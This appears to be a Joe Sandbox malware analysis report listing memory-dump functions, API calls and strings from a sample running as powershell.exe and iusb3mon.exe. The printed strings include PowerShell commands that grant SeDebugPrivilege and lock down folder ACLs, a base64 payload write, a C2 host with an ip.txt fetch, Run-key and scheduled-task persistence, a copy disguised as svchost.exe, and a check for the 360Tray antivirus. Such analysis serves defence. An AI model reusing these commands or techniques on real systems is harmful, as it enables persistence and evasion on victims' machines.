Opcode Fuzzy Hash: f3ba7afe195e6d9c34864c50777f160b6def7ecdf484c4d5c6e84570c3761e76
Instruction Fuzzy Hash: A321F5786046068FC744EB7CE481A6EBFB1FF88310F5096A8C2019F375DBB0A9058B90

Function 031FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467104476.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_31fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ff40a759647a4a8fb79c4afa18900ca0ccefd1b54cd13ba0a6055ea963235d
Instruction ID: 48c1323621cae6b264e93812e98f0dba07e3706962efca3e12d32b59caaf479f
Opcode Fuzzy Hash: b6ff40a759647a4a8fb79c4afa18900ca0ccefd1b54cd13ba0a6055ea963235d
Instruction Fuzzy Hash: 7901F2B2404344AFE714CA25E980B77FF98DF49324F1CC05AEE080B24ACBB89881C6B1

Function 031FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467104476.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_31fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6724714c5db3aee231c0433b856cd94282fb783e8932cb21f394ae1f96ea522
Instruction ID: a37911fd61ed3c9cdf09961104f1b57b830260669c1052b3ab389e0342bbc1e4
Opcode Fuzzy Hash: d6724714c5db3aee231c0433b856cd94282fb783e8932cb21f394ae1f96ea522
Instruction Fuzzy Hash: 5201407240E3C09FD7128B25D894B62BFB4DF47224F1D81CBD9888F1A7C2699848C772

Function 03568618 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2c91bfaffcccd024f13f446e184a3f3d243ac620f836319a93e43e71897130
Instruction ID: 1dcd78b2df43a810ab6ab9a2a3754906b9350445bddce33c36615ea05d10972d
Opcode Fuzzy Hash: 3b2c91bfaffcccd024f13f446e184a3f3d243ac620f836319a93e43e71897130
Instruction Fuzzy Hash: BB01F4316012549FCB20CB15E488AABFFF4EF82259B0981ADE4995B261C730D949CBA1

Function 03562C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151312eaea0a92cc28b67c4d40361da5d9519f7d1dc7bc77f0d275e1a460b165
Instruction ID: 295b2f2bdf3b92b1f64ef463249ec109c40288b5bd2e63ceaea497e9f2d929b3
Opcode Fuzzy Hash: 151312eaea0a92cc28b67c4d40361da5d9519f7d1dc7bc77f0d275e1a460b165
Instruction Fuzzy Hash: 32F0D435A00109DFDB15CF9DD990AEEF7B1FF88324F248159E515A72A1C732AC52CB60

Function 035670B0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 930c2a36395ff273efa463eff51fd9abcf96e60fbc4093c1e88a261186a5a254
Instruction ID: b67cf7877addd42e12009ea0152adc254f931a5714333afab311359482dc78fb
Opcode Fuzzy Hash: 930c2a36395ff273efa463eff51fd9abcf96e60fbc4093c1e88a261186a5a254
Instruction Fuzzy Hash: 7BF09774E0020A8FC780DF68D485AAEBBF0FF49214F505199D509EB321E630A945CB91

Function 03568270 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1602a40589338e11d3b600684b52b3650ba9daa348f82b61417c91df2d15793a
Instruction ID: f6155274473cac670c13967fef13c05a540fddaad7640a17378923efa289e0a1
Opcode Fuzzy Hash: 1602a40589338e11d3b600684b52b3650ba9daa348f82b61417c91df2d15793a
Instruction Fuzzy Hash: 1BF0E5312047418FD345D368E480B9ABB56EFC1304F0886BED2058F646CFA46889C390

Function 03567BF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dface0a1f4963fb496138a8c4eb4b5e6ba62a41c5c9da0f280725e1a596ded34
Instruction ID: 4d651d015947da4883780e53ab818d3cdeac6deec05d2c052ffede51863fbbf8
Opcode Fuzzy Hash: dface0a1f4963fb496138a8c4eb4b5e6ba62a41c5c9da0f280725e1a596ded34
Instruction Fuzzy Hash: 84D05E392002149FC705EB68E448D557BA9EB4D72071180A5EA0987322CB21DC008B91

Function 03567BEC Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2467893590.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19d3a1e31caef2b4455f48d6c8389b3f097e0ba9ca82a8ebd019eb1fd86a819
Instruction ID: f3b2144b5b1a22aba270025219f8d0407940b9d7836e465bd6f01eeb66acbb83
Opcode Fuzzy Hash: e19d3a1e31caef2b4455f48d6c8389b3f097e0ba9ca82a8ebd019eb1fd86a819
Instruction Fuzzy Hash: 8AD05E39200210CFCB45EF64E6489657BB5EB4C71171580A5EA0ACB332CB30CC008B60

Analysis Process: powershell.exePID: 3472, Parent PID: 424COMMON

Executed Functions

Function 073A0450 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

`Bak, xrefs: 073A0673

Memory Dump Source

Source File: 00000016.00000002.2591169789.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_73a0000_powershell.jbxd

Similarity

API ID:
String ID: `Bak
API String ID: 0-3489305479
Opcode ID: 1ffb4875923b265b3ae887140b08837a2a4538495f5343e2da30ee8d65183e23
Instruction ID: 4a628858179e3e093e3be18b0cc598d81e71f5e97d8940c6d0d7c30cbff1efa5
Opcode Fuzzy Hash: 1ffb4875923b265b3ae887140b08837a2a4538495f5343e2da30ee8d65183e23
Instruction Fuzzy Hash: AA8138F0704205EFEB289F69C411BAA7BA6FFC5314F14C06AE5198B691EB71D841CB91

Function 04552DF0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47dbb33d382f6931ec89aa4d5a72e4fd0f8b69af5e4e9026a53484e9d55edeeb
Instruction ID: 75d38455faf7464f1023003c839d66ce86a1d313ecf9af37d8c6fa7152ce5e2d
Opcode Fuzzy Hash: 47dbb33d382f6931ec89aa4d5a72e4fd0f8b69af5e4e9026a53484e9d55edeeb
Instruction Fuzzy Hash: 63918B74A00245CFCB05CF59C4A4ABAFBB1FF49310B2486AAE955AB365C735FC41CBA0

Function 04557388 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05454d139e1c945b1035bae150f1a512d215ce51579346ec7fda0925f7890009
Instruction ID: 1cc2c6cfe5bb3312c66fe791a62015dc6c582d7d3b2db6bc1a35caef3178156f
Opcode Fuzzy Hash: 05454d139e1c945b1035bae150f1a512d215ce51579346ec7fda0925f7890009
Instruction Fuzzy Hash: AE513731701215CFEB159B74C864BAD77F2BF89248F1405A9D406EB3A0DB35AD82DF21

Function 04552F01 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af54b45b747c8100ef981fdc32eb71c87f41458adf45d525a0238fe8a44f289
Instruction ID: 8435a2757de76652d74062878259093124478052c1157044af39dd43226ae3f8
Opcode Fuzzy Hash: 2af54b45b747c8100ef981fdc32eb71c87f41458adf45d525a0238fe8a44f289
Instruction Fuzzy Hash: E6413874A00205DFCB09CF59D5A49BAFBB1FF48310B11819AE915AB365C732FC91CBA0

Function 073A0428 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2591169789.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_73a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c723e4a16a71892736fb859c0247f209a9eee1f941e296c350bdf44e47a16a
Instruction ID: 259b55ec9c8e1d1e2db6c976f10554d6d476deac5fdff71470c8199b8e4daf35
Opcode Fuzzy Hash: f4c723e4a16a71892736fb859c0247f209a9eee1f941e296c350bdf44e47a16a
Instruction Fuzzy Hash: BF3190F0A08206EFEF28DF29C4466A97BB5FF45310F1581A7E41C8B162EB34D985CB91

Function 04557273 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12830f7fb8b8147766709adad4b21c5fb99599959966161a5e84a53444fd8e72
Instruction ID: 35c23ae132285a978db0f1472b5d6943689b74a07d2f207411f8b82724f7c83a
Opcode Fuzzy Hash: 12830f7fb8b8147766709adad4b21c5fb99599959966161a5e84a53444fd8e72
Instruction Fuzzy Hash: B331CD70A0111ACFDB19DF69CD50F9DB7B1BF84204F1145E9D508AB2A1DA34AE85CF90

Function 00F8D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2483743015.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e30da45a3bcc28e255b35c04342bc900493fb4dcee4b1a4d8cf7d3b584dfa2
Instruction ID: 4d43cb8917e7383960fd6feb94a637f5bc4d4c423aea9c976b761f1fafd04c84
Opcode Fuzzy Hash: a2e30da45a3bcc28e255b35c04342bc900493fb4dcee4b1a4d8cf7d3b584dfa2
Instruction Fuzzy Hash: D1012B72904344DAF7106E25DD80BA7BF98EF41374F18C01AED484B2CAC6B99841E7B1

Function 00F8D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2483743015.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21bb361e4639e8330bddd7bd94b2d3b0a0c9820c4966a06192e2b888858e0bfc
Instruction ID: 60c6fd322591f1c635c8f560b42782b52871bdf5018d8557de39920abfc39931
Opcode Fuzzy Hash: 21bb361e4639e8330bddd7bd94b2d3b0a0c9820c4966a06192e2b888858e0bfc
Instruction Fuzzy Hash: 82014C6240E3C49FE7128B258C94B52BFB4EF53224F1981DBD9888F2E7C2695849D772

Function 04556F42 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7647ddab42167ec5e15bf30423fd4894b656c3bf5a6fa7bdca145ed3e47b7228
Instruction ID: afd7646b250ac28096605844ec6d054580569a356dd3d7f3d573230f3e79e87d
Opcode Fuzzy Hash: 7647ddab42167ec5e15bf30423fd4894b656c3bf5a6fa7bdca145ed3e47b7228
Instruction Fuzzy Hash: F101E875E0428A8FC784DF68D4559ADBFF0BF09314F5041AAD9099B322E631A942CB91

Function 04556F50 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c6023a363cf0330f5e70f2a69003058cc82431bebe542c6b227e3aa81a97f6
Instruction ID: 3f5794ca7f0b7b1c33033395e08cf23f8cacb37fcfd427a10fe7857da63abb3f
Opcode Fuzzy Hash: f4c6023a363cf0330f5e70f2a69003058cc82431bebe542c6b227e3aa81a97f6
Instruction Fuzzy Hash: 84F09774E0020A8FC780DF68C485AAEBBF1FF49214F505199E909EB321E630A941CB91

Function 0455718C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2488856496.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a6213d38c5032304f6b4e6aebc4acc8df23e5e07e11cf2338ebd527c7ef2e6
Instruction ID: 59dc331443aabe369e52551565a447d774b940348bfc8fd6c139eec438632704
Opcode Fuzzy Hash: 92a6213d38c5032304f6b4e6aebc4acc8df23e5e07e11cf2338ebd527c7ef2e6
Instruction Fuzzy Hash: 36E0C2725013A58FCB06CB51E4904FABFB4EE4226A31440EAE59927111C2309A1ADBB0

Analysis Process: iusb3mon.exePID: 4144, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.7%
Total number of Nodes:	498
Total number of Limit Nodes:	36

Executed Functions

Function 062967CC Relevance: 131.7, APIs: 44, Strings: 31, Instructions: 466
filethreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 062967DD
DeleteFileA.KERNEL32(C:\del), ref: 062967EE
DeleteFileA.KERNEL32(C:\tzfz), ref: 062967F5
DeleteFileA.KERNEL32(C:\1.ini), ref: 062967FC
DeleteFileA.KERNEL32(C:\2.ini), ref: 06296803
DeleteFileA.KERNEL32(C:\inst.ini), ref: 0629680A
DeleteFileA.KERNEL32(C:\odbc.ini), ref: 06296811
DeleteFileA.KERNEL32(C:\odbc.inst.ini), ref: 06296818
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 0629681F

Part of subcall function 06291C74: SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

Part of subcall function 06295CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06295CF6
Part of subcall function 06295CE6: Process32First.KERNEL32(00000000,?), ref: 06295D0F
Part of subcall function 06295CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06295D2A
Part of subcall function 06295CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06295D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062968AB
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062968B3
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062968BB
CreateThread.KERNEL32(00000000,00000000,0629628E,00000000,00000000,00000000), ref: 062968D5
CreateThread.KERNEL32(00000000,00000000,06295E1F,00000000,00000000,00000000), ref: 062968E9
CreateThread.KERNEL32(00000000,00000000,06295D5B,00000000,00000000,00000000), ref: 062968FD
CreateThread.KERNEL32(00000000,00000000,06296313,00000000,00000000,00000000), ref: 06296911
CreateThread.KERNEL32(00000000,00000000,0629650A,00000000,00000000,00000000), ref: 06296925
CreateThread.KERNEL32(00000000,00000000,06296780,00000000,00000000,00000000), ref: 06296931
CreateThread.KERNEL32(00000000,00000000,06291B6D,00000000,00000000,00000000), ref: 0629693D
CreateThread.KERNEL32(00000000,00000000,06296587,00000000,00000000,00000000), ref: 06296949
WSAStartup.WS2_32(00000002,?), ref: 06296A11
socket.WS2_32(00000002,00000001,00000000), ref: 06296A1C
GetCurrentThreadId.KERNEL32 ref: 06296A2B
htons.WS2_32(00006365), ref: 06296A32
inet_addr.WS2_32(huazai168.com), ref: 06296A3D
connect.WS2_32(?,00000002,00000010), ref: 06296A4F
InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 06296A9F
InternetOpenUrlA.WININET(?,?,00000000,00000000,80000100,00000000), ref: 06296AD7
InternetReadFile.WININET(?,?,00000824,?), ref: 06296AF3
InternetCloseHandle.WININET(?), ref: 06296B3C
InternetCloseHandle.WININET(?), ref: 06296B45
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06296B7A
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06296BF4
CopyFileA.KERNEL32(?,?,00000000), ref: 06296C06
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 06296C20
RegSetValueExA.ADVAPI32(?,062C2BD8,00000000,00000001,?,00000018), ref: 06296C3B
RegCloseKey.ADVAPI32(?), ref: 06296C44
Sleep.KERNEL32(0000003C), ref: 06296C51
ExitProcess.KERNEL32 ref: 06296C5A
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 06296C8E
Sleep.KERNEL32(0000003C), ref: 06296CAD
GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06296D1D
CopyFileA.KERNEL32(?,C:\Windows\svchost.exe,00000000), ref: 06296D2F
Sleep.KERNEL32(000001F4), ref: 06296D56

Strings

c:\inst.ini, xrefs: 06296967, 062969A3
Cdefgh Jklmnopq Stuvwxya Cdef, xrefs: 06296D3F
powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062968B6
huazai168.com, xrefs: 062969F8, 06296A38, 06296AB0, 06296B17, 06296B2A
C:\odbc.inst.ini, xrefs: 06296813
Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 06296D3A
C:\ProgramData\Microsoft\Program, xrefs: 0629683D
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06296824
C:\del, xrefs: 062967E9
360Tray.exe, xrefs: 06296890, 06296957
iiiiiiiiiiiiiiii.exe, xrefs: 0629698C
C:\1.ini, xrefs: 062967F7
C:\ProgramData, xrefs: 06296853
iiiiiiiiiiiii.exe, xrefs: 062969C8
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06296C16
C:\ProgramData\Data\upx.rar, xrefs: 06296874
Mozilla/4.0 (compatible), xrefs: 06296A9A
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062968A6
C:\ProgramData\Program\iusb3mon.exe, xrefs: 06296832
C:\un.exe, xrefs: 06296869
C:\ProgramData\Program, xrefs: 06296848, 06296B86
C:\inst.ini, xrefs: 06296805
C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 0629681A
C:\ProgramData\Data\upx.exe, xrefs: 0629685E
C:\tzfz, xrefs: 062967F0
360tray.exe, xrefs: 06296881, 06296993
C:\2.ini, xrefs: 062967FE
C:\Windows\svchost.exe, xrefs: 06296D23, 06296D27
C:\odbc.ini, xrefs: 0629680C
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062968AE
http://%s/ip.txt, xrefs: 06296AB7

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Thread$Create$Delete$Internet$Close$ExecHandleModuleNameOpenSleep$CopyProcess32$AttributesCtrlCurrentDispatcherExecutionExitFirstNextProcessReadServiceSnapshotStartStartupStateToolhelp32Valueconnecthtonsinet_addrsocket
String ID: 360Tray.exe$360tray.exe$C:\1.ini$C:\2.ini$C:\ProgramData$C:\ProgramData\Data\upx.exe$C:\ProgramData\Data\upx.rar$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Program$C:\ProgramData\Program\iusb3mon.exe$C:\Windows\svchost.exe$C:\del$C:\inst.ini$C:\odbc.ini$C:\odbc.inst.ini$C:\tzfz$C:\un.exe$Cdefgh Jklmnopq Stuvwxya Cdef$Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop$Mozilla/4.0 (compatible)$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$c:\inst.ini$http://%s/ip.txt$huazai168.com$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 1792369710-133950496
Opcode ID: 2d09328318b3d7d416217475cd4e1c5c707bc8ad88c541fb77ffed4ca34786ef
Instruction ID: e1ecc8ea44a54a9f5471f158752e2324bfcb81efd41198c40425cd0240961dd0
Opcode Fuzzy Hash: 2d09328318b3d7d416217475cd4e1c5c707bc8ad88c541fb77ffed4ca34786ef
Instruction Fuzzy Hash: 35E1A4B096434ABEFF91ABA0AC89EEF7AADDF85798F041455FD4471081C6B08E44CB71

Function 00342170 Relevance: 79.3, APIs: 35, Strings: 10, Instructions: 549
sleepcomwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,A302B08A), ref: 003421A2
CoInitializeEx.OLE32(00000000,00000000), ref: 003421AC
CoCreateInstance.COMBASE(0035F104,00000000,00000001,0035F0F4,?), ref: 003421EC
CoUninitialize.COMBASE ref: 00342209

Part of subcall function 00342DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00342E36
Part of subcall function 00342DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00342E58
Part of subcall function 00342DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00342E78
Part of subcall function 00342DE0: std::_Facet_Register.LIBCPMT ref: 00342EE5
Part of subcall function 00342DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00342F01

_com_issue_error.COMSUPP ref: 003427CB
MessageBoxA.USER32(00000000,003689C0,003689B8,00001010), ref: 003427F1

Strings

User Name, xrefs: 003424E9
C:\ProgramData\program\iusb3mon.exe, xrefs: 00342587
UserLoginStartupTask, xrefs: 0034267D
Task registered successfully., xrefs: 00342757
Failed to register task., xrefs: 00342775
Failed to initialize COM library., xrefs: 003421B6
Failed to connect to Task Service., xrefs: 003422D0, 00342394
Failed to create task definition., xrefs: 00342499
Failed to get root folder., xrefs: 00342453
Failed to create Task Service inst ance., xrefs: 003421F6

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
